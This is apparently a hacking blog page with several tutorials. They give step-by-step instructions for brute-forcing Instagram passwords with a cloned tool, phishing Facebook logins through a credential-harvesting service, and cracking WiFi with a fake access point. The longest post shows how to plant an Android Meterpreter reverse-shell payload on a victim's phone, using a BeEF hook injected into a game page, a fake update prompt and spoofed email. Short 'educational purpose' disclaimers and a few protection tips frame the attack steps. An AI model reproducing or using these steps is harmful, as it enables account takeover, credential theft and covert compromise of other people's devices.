Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

Sunday, 10 June 2018

How To Hack Instagram Account - SAMHACKERSWORLD

NOTE : THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY 

Welcome Friends, Today I am sharing with you a great idea.Now a days everyone wants to Hack Instagram Account.So Today I will Tell you How To Hack Instagram Account.Now Let's go on  a our Topic.👇

STEP-1: INSTALL TERMUX APP FROM PLAY STORE OR ANY WHERE OR CLICK HERE

STEP-2: GOTO INSTAGRAM AND COPY INSTAGRAM ID WHICH YOU WANT TO HACK

STEP-3: GOTO TERMUX APP AND TYPE "pkg update" AND HIT ENTER

STEP-4: AFTER THAT ASK "Y/N" WRITE "Y" AND HIT ENTER

STEP-5: NOW TYPE "pkg upgrade" AND HIT ENTER

STEP-6: NOW TYPE "apt install python2" AND HIT ENTER

STEP-7: NOW TYPE "apt install git" AND HIT ENTER

STEP-8: GOTO BROWSER AND SEARCH "INSTAHACK GITHUB" AND OPEN WEBSITE & COPY LINK

                                       OR

STEP-9: COPY LINK "https://github.com/avramit/instahack"

STEP-10: NOW OPEN TERMUX APP AND TYPE "git clone https://github.com/avramit/instahack" AND HIT ENTER

STEP-11: NOW TYPE "ls" AND HIT ENTER


STEP-12: NOW TYPE "cd instahack" AND HIT ENTER

STEP-13: NOW TYPE "ls" AND HIT ENTER

STEP-14: NOW WE HAVE TO REMOVE/DELETE THE PASSWORD "wordlist.txt" FILE BECAUSE THIS WORD LIST CONTAINS ONLY TWO OR THREE PASSWORDS AND ADD A BIG "wordlist.txt" FILE

STEP-15: NOW TYPE "rm -f pass.txt" AND HIT ENTER

STEP-16: NOW TYPE "ls" AND HIT ENTER

STEP-17: YOU CAN ADD ANY "wordlist.txt" FILE

STEP-18: RENAME ANY WORDLIST FILE AS "pass.txt"

STEP-19: NOW WE WILL COPY THE WORDLIST FILE IN INSTAHACK DIRECTORY TYPE "cd /sdcard" AND HIT ENTER

STEP-20: NOW TYPE "ls" AND HIT ENTER

STEP-21: NOW TYPE "cp -f pass.txt $HOME/instahack" AND HIT ENTER

STEP-22: NOW TYPE "ls" AND HIT ENTER

STEP-23: NOW TYPE "cd $HOME" AND HIT ENTER

STEP-24: NOW TYPE "ls" AND HIT ENTER

STEP-25: NOW TYPE "cd instahack" AND HIT ENTER

STEP-26: NOW TYPE "ls" AND HIT ENTER

STEP-27: NOW YOU SEE WORDLIST IS COPIED HERE

STEP-28: NOW OPEN INSTAHACK TYPE "python2 hackinsta.py" AND HIT ENTER

STEP-29: NOW TYPE "INSTAGRAM USERNAME" AND HIT ENTER

STEP-30: NOW TYPE "n" AND HIT ENTER

STEP-31: PLEASE WAIT UNTIL IT FINDS CORRECT PASSWORD

STEP-32: WHEN YOU FOUND CORRECT PASSWORD SO COPY PASSWORD

STEP-33: NOW GOTO INSTAGRAM WEBSITE OR APP AND TYPE USER NAME AND PASTE PASSWORD THEN CLICK ON LOGIN BUTTON

NOW YOU SUCCESSFULLY HACKED INSTAGRAM ACCOUNT
                                        ------------------------------
                                 |SAMHACKERSWORLD|
                                 ----------------------------

Sunday, 20 May 2018

How Hackers Hack Facebook Account Password 2018? How To Being Protected- SAMHACKERSWORLD

Hacking Facebook Account Password From Android, iPhone and PC are the hardest questions for us, that everyone is looking for. And yes! It’s hard to find “how to hack Facebook account”, but after doing numbers of the experiment we have found some of the tricks that may work for you. Yeah, I know. Many of our regular readers text us on Facebook and even on WhatsApp and asking a tired, full question “How To Hack Facebook Account Password 2018 (Working)” Well Before gets started just make sure you won’t misuse this hack or misguide anyone. As this hack is just and only for Educational Purpose. Our site provides security tips to protect your Facebook account from hackers. The ultimate purpose of sharing these methods is to aware you. Must read all these methods carefully, beware of all attacks, and protect your Facebook account from hackers.


Before learning How To Hack Facebook Account? We want you to read some terminology that hackers are using to target you!


Disclaimer: We HOPE, You will not try this on someone in real life – this is purely for educational objectives. We TRUST, our readers aren’t so vile that they would use this to really compromise on anyone(s) PC.


Contents:


1 What is Phishing Attack?


2 Method #1: How To Hack Facebook Account Password Easily From Android?

2.0.1 Steps To Hack into Facebook Account:


2.1 How To Find Hacked Email and Password Information

2.1.1 Steps To Know Victims Account Details:


2.1.2 How To Prevent Phishing Attack


3 Method #2:  Hack Facebook Account By Keylogging 2018?

3.0.1 How To Protect Yourself From Keylogger


4 Method #3: Facebook Hacking By Password Jacking 2018

4.0.1 How To Protect From Password Jacking?


5 Method #4: Hack Facebook Password Using cookies Stealing.

5.0.1 How To Preven Cookies Stealing?


6 Method #5: Hack FB Account by Social Engineering?

6.1 So How This Attack Performs?


6.2 How To Being Safe and Secure On Facebook?


6.3 How To Recover Your Hacked Facebook Account From Android?


What is Phishing Attack?


Phishing is a form of fraud in which the attacker tries to learn information such as login credentials. Phishing is popular with cybercriminals, as it is far easier to trick someone into clicking a malicious link in a seemingly legitimate email than trying to break through a computer’s defenses.The phishing “hooks” that get the highest “open” or click through rate and the Facebook posts that generate the most likes.


Method #1: How To Hack Facebook Account Password Easily From Android?


This is a very common method to hack anyone account. In This method, what a hacker can do? is he creates a fake login page which exactly looks like the real “Facebook Page” (you won’t able to recognize which one is fake and which one is real.) and then asks the victim to log in. Once the victim logs in through the fake page the, the victims “Email Address/Phone Number” and “Password” is stored on the hacker’s server. and Then Hacker can get access to it and get into your account.


Steps To Hack into Facebook Account:


#1 First You Need To Do Google Search of “Z-SHADOW”


#2 After opening click on “Sign Up” Here.

Sign Up is also very easy, Fill the signup form with your basic information.

#3 Yeah! You created your account Successfully! Now go ahead and go toLogin Panel Section at left top corner, enter your registered username and password and click on Login & go inside the Z-Shadow.

#4 Here you find a new page and there you will find different types of apps for Facebook.Choose any link that you want to send your victim e.g., if you want him/her to give followers then copy the link of that particular app. And what does hacker do? They force their victims to access their URL and hack Them! So One more thing you need to do is Select Language “English”

#5 Now send that copied link to your victim

And as the victim, open it and enter his/her password and Hit Login Button. His/her Account Got Hacked!

How To Find Hacked Email and Password Information


This Technique only works if and only if Your Victim or You “Enter” you details like Email, Password There. Unless Nothing Would Happen!


Steps To Know Victims Account Details:


#1 Now here we are going to check whether victims login or not.


#2 For this, again open Z-shadow account and then go to the top of the menu bar here is the My Victims Options.


#3 Open My Victims Option and see The Password and Email that he/she entered.


How To Prevent Phishing Attack


#1. Don’t click


#2. Go direct.


#3. Don’t try to “win” anything.


#4. Don’t panic.


#5 Never Login your Facebook account on other devices


#6 Use Google Chrome; it identifies the phishing page.


#7 Avoid emails that ask you to log in your facebook account


Method #2:  Hack Facebook Account By Keylogging 2018?


Keylogger is another Dangerous Program that can be used to hack some critical accounts information. This is very harmful even professional peoples fell into it without having any knowledge. Keylogger is installed on victim’s computer, will record everything victim types on his/her computer. The logs are then sent back to the attacker by either FTP or directly to hackers email address. Hack FB Account PAssword


How To Protect Yourself From Keylogger


Scan your PC and Pendrive from Trusted Antivirus


Keep in mind, Download Original and Trusted Softwares


Method #3: Facebook Hacking By Password Jacking 2018


Password jacking is a ninja technique that can be done by victims closest person. In a simpler way, This method only works if you know the victim’s information like his email, phone number, date of birth, etc. using this, you have to develop a ninja ability to guess the password or use any password guessing emulators.


How To Protect From Password Jacking?


Use Stronger Password (Combination of Symbols, Numbers, Alphabets)


Don’t use common passwords like Date Of Birth, 123456, etc


Method #4: Hack Facebook Password Using cookies Stealing.


Cookies are the important files that are stored on your hard disk drive while you are surfing the internet. It contains all the information that you have access to the web it may provide your passwords etc. Now the question is without getting Cookies How Could a Hacker Hack It? Well, The answer is so simple. Hackers don’t get the login passwords, but they can easily access the victim’s account by cloning the cookies, tricking Facebook into thinking the hacker’s browser is already authenticated. They can use Firesheep for this purpose.


Firesheep only works when the attacker and victim are on the same WiFi network. Aside from jacking attack is another name for HTTP session hijacking, but it’s more targeted towards WiFi users.


How To Preven Cookies Stealing?


Avoid leaking cookies over HTTP


Avoid open WiFi networks


Use VPN


Now moving to the security part of this tutorial. Safety and privacy are primary things on the internet.


Method #5: Hack FB Account by Social Engineering?


In Simple terms, Social engineering is an art of developing victims mind in such a way so that they give up information to you i.e secrets/Passwords. Or Manipulating someone’s mind behavior and ask the victim to do what you want to is exactly a social engineering.


So How This Attack Performs?


Well, there are many social engineering tools along with many strategies that an ethical hacker can use to target his/her victim. If you want to be a perfect in Social Engineering then you need to know more about it. For that, we requested you to learn more about it in Google.


How To Being Safe and Secure On Facebook?


The less information you give out on Facebook for everyone to see, the more difficult you make it for hackers.


Yes, These above lines are 100% True! What you think posting regularly makes you smart? Yes, it might be, but social media is the platform from where anyone can get any of details easily. so share less and act more!


How To Recover Your Hacked Facebook Account From Android?


It is a very simple way to recover your hacked Facebook account. If your account got hacked, you could try to forget your password and recover it from there, but if else, you won’t be able to recover your account and wants to get it back or close it then you may go through this link


You can report compromised (Hacked) to Facebook just by checking this link – https://www.facebook.com/hacked


Myth: Hacking Requires All Sorts of Exotic Software


Hacking of Facebook Account is 2018 os somewhere not possible as we all Facebook has invested so much in its user’s security. However, if you still want to hack someone’s account then you have to know the art of social engineering but this you can do this task easily.


Wrap Up: So These were the most common tricks that a hacker used to target you and hack your account. This is How you can Hack Facebook Accounts 2018 and I hope you will not be fallen for any scam that we mentioned above. Please don’t misuse these techniques. We get numbers of emails on a daily basis asking us to how to Hack friends Facebook from Android. These were some of the Basic Concepts of Hack Facebook accounts. If you are your closest one, then don’t forget to share it with your friends. â€śHack FB” 


Sunday, 29 April 2018

Wifi Hacking - SAMHACKERSWORLD

NOTE : THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY .

Hello friends. Today in this tutorial we are going to learn one of the easiest way of  cracking wifi password.

REQUIREMENTS:-

COMPUTER / LAPTOP ( It must have wireless network adapter ).


KALI LINUX ( Either on system or Live USB ).


A WORKING INTERNET CONNECTION.


PROCESS:-

    

STEP 1 : Download Fluxion.

Download

 

STEP 2 : Extract Fluxion.

After downloading Fluxion. Go to downloads and extract Fluxion.

STEP 3 : Install Fluxion.

Copy the extracted Fluxion folder in main directory.


open terminal.


type  –  cd fluxion


type  –  ls


type  –  cd install


type  –  ./install.sh


 

STEP 4 : Run Fluxion.

Type  –  cd fluxion


Type  –  ls


Type  –  ./fluxion.sh


 

STEP 5 : Cracking Wifi.

Select English


Select all channel(s)


 Scan for 30 to 40 seconds


 Press (ctrl+c) to stop


 Select router id no to attack


 Select FakeAP – Hostapd


 Press enter


Select pyrit


 Select Deauth all


Check for handshake when captured


 Select create SSL certificate


 Select web interface


 Select 


Password will be shown as soon as user  connects to that network.


Sunday, 22 April 2018

Command's list - SAMHACKERSWORLD


chmod - give especific permissions to an specific file 

cat - look at, modify, or combine a file. You can also copy files with this command by "reading" it to another file instead of to the screen.

cd - change from one directory to another

cp - Copy a file from one location to another

dd - copies exact locations to other locations. Can be an entire drive, a folder, etc. dd if= of=. uses an input file and an output file.

df - how much free disk space. 

du - show disk usage of files. Add "-h" to get human readable. Especially useful when you add "-d1" to limit the directory depth to 1. If you run "du -h -d1", it will tell you how much space each directory occupies, including their contents summed.

exit - exits the shell you are in.

grep - search within a file for a text string. Also useful for parsing command output. 'ls | grep something' is a quick way to list files that contain the string "something" (although "ls *something*" would do it, too, but grep can do a lot more)

ifconfig- get network interface configuration. Good for getting your own IP address.

kill - kill a process by PID

ls - lists all files in a directory .

mv - Move a file from one location to another. 

ping - see if an internet host is alive

pm - android package manager. LOTS of useful things in here, type pm by itself for the help screen

ps - list processes. Useful to see what is running

reboot - reboots your device

reboot recovery - reboots you into recovery 

reboot-bootloader -reboots the device in bootloader- fastboot

rm - remove a specified file

rmdir - remove a directory. rm can't do it unless you remove recursively with -R

su - Substitute User. We type this to switch to the rootuser. You need to type this command first to do a lot of the other commands.

sync - synchronizes any data on disk with data in memory. We type this before rebooting to ensure we've got all data written

tar - creates taped archives. Compresses files like winzip, 7zip, winrar and others tar

top - like task manager, it displays running processes. in Linux the q key quits. On Android I don't know how to make it quit other than closing the app.

uptime - displays how long it has been since you last rebooted the system. Interestingly enough the "Menu Key > System > About Phone > Status > Up time" on my phone does not match "uptime" typed in the terminal emulator.

Tuesday, 10 April 2018

Android Hacking part-2: Install apps without touching phone - SAMHACKERSWORLD

As I promise you in the previous article that my next post will be related to android hacking. In this article, you will learn how to install apps in your victim phone easily or without touching his/her phone.


I know it is not easy to take someone phone then install the ap and if you forget to open the app then no results.

If you have any problem, suggestion let me know by comments I help everyone.

Note: This is for education purpose only. Please don’t misuse it.

Requirements

beef


metasploit


Patience  (most of the readers don’t have patience )


Practical

We will create an android payload or virus or malicious app using Metasploit. I already posted here to generated android payload using Metasploit check it.

After creating the app, you launch Metasploit and wait for receiving the connection. Here are commands

┌─[ root@kali ]-[~]


└──╼ # service postresql start;msfconsole

It will launch Metasploit. Further commands

┌─[ root@kali ]-[~]

└──╼ # use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost <local IP address>; set lport 4444

Remain this terminal as and follow further steps.

Launch beef. In Kali, you can start from the sidebar.

In parrot or any other security distribution, you can launch using this command.


┌─[ root@kali ]-[~]

└──╼ # beef-xss

Beef is browser exploitation framework. No matter either victim is using chrome, firefox you will not face any problem.

As you can see in the screenshot, it asks for the username and password. These are default username and password.

beef

beef

After the successful login, a new webpage will open where in the sidebar, there are two directories online browser and offline browser. We can hook browser using a script then we will able to run own codes to the victim browser. When you hook a browser, it will show in the online browser. If it is confusing, don’t worry you will understand everything.

Beef also launch a terminal when you start it. Here is the screenshot of terminal I have highlighted the example remember it we will use in future.

To hook own browser visit this link http://127.0.0.1:3000/demos/basic.htmlor insert script tag. When you open this beef will show something like this.

Meaning you hooked your browser (127.0.0.1 mean your browser).  Click on 127.0.0.1 and choose commands. In the commands tab expend social engineering and pick Fake update bar (chrome) because I’m using chrome you can find victim browser using details tab.

Open a new terminal and type ifconfig to find your IP address.

In my case, it is 192.168.43.7.

To hook a victim, my URL will be http://192.168.43.7:3000/demos/basic.html.

Connect your phone to the same network that you are using on your computer. Open this URL on the android phone here is what I got on the beef control panel. In the commands expend social engineering and choose Fake update bar (chrome) because I’m using chrome you can find browser using details tab.

In the URL we will place our android payload URL. You can upload payload to the very famous website like google drive or start own server.

Just run this command.

┌─[ root@kali ]-[~]

└──╼ # service apache2 start

After this copy your android virus that you generated in the first step to /var/www/ directory. So URL of the Android virus is http://<IP>/appname.apk

I think you know how to find local IP address. Paste in URL tab of beef and click on execute.

On executing your android phone will show you something like this.

If you choose Install Missing Plugins, then the app will start downloading.

Tap on open, the app asks for installation. After installing when you open it, you will be in the browser app (because our app will display nothing). 

But we will get a meterpreter session.

I already posted how to hide app icon, get meterpreter season again and again in the first post of Android hacking.

How to perform a real task


In the actual case, we can’t send the link like this. Your victim will close tab immediately. So we should create something engaging.

I found a snake script. It is the game developed using JavaScript you can download it from GitHub.

Note: This game only works with arrow keys. Maybe android user will be unable to play the game. So we will show install missing plugins to play the game.

Here are simple steps to do this.

First of clone this game from Github.

┌─[ root@kali ]-[~]

└──╼ # git clone https://github.com/Mariacristina88/Snake-game.git; cp -r ./Snake-game /var/www/html; nano  /var/www/html/Snake-game/snakegame.html

If above Linux commands confuse you then read my Linux commands for beginners post. Semicolon (;) is used to run two or more commands in the single line.

It will download and copy the game to HTML folder and open snakefile.html. Just insert this script tag.

<script src="https://192.168.43.60:3000/hook.js"></script>

Press ctrl+o to save ctrl+x to exit.

Now, send URL http://192.168.43.60/Snake-game/snakegame.htmlto your victim. You can port forward your router to perform it over the internet.

Now when our victim opens the link, he will see something like this.

And we will get hook that browser.  After that repeat above steps to install apps

Tip: you can add custom CSS to make fake update clear. So our victim will install app successfully.

Part-2 Email spoofing


As clear from its name we will spoof our email address. I mean you can send email from any address (yeah from even bill gates email address, do you have bill gates email address?). To spoof an email address, you need only SMTP settings.

Don’t confuse by above words there are tools and websites.

I use https://emkei.cz/ For sending spoofing emails.

This website has a straightforward interface. Just enter to, from, subject, message and send the message.

But Gmail service will catch it and move emails to spam.

In case if your victim is using webmail service then 99% chances are that your message will appear in the inbox.

Here is the screenshot of mail I send to my webmail using this website. 

Thus using spoofing email, you send the malicious app to your victim. Just make sure your message should be real and quick.

Problem with this method is who used webmail on the android phone, or my victim is using Gmail.

Well, this is part of social engineering. You should find your way to hack your victim phone. Don’t we will go further in advance of Android hacking but due to exams i will publish next article in futue.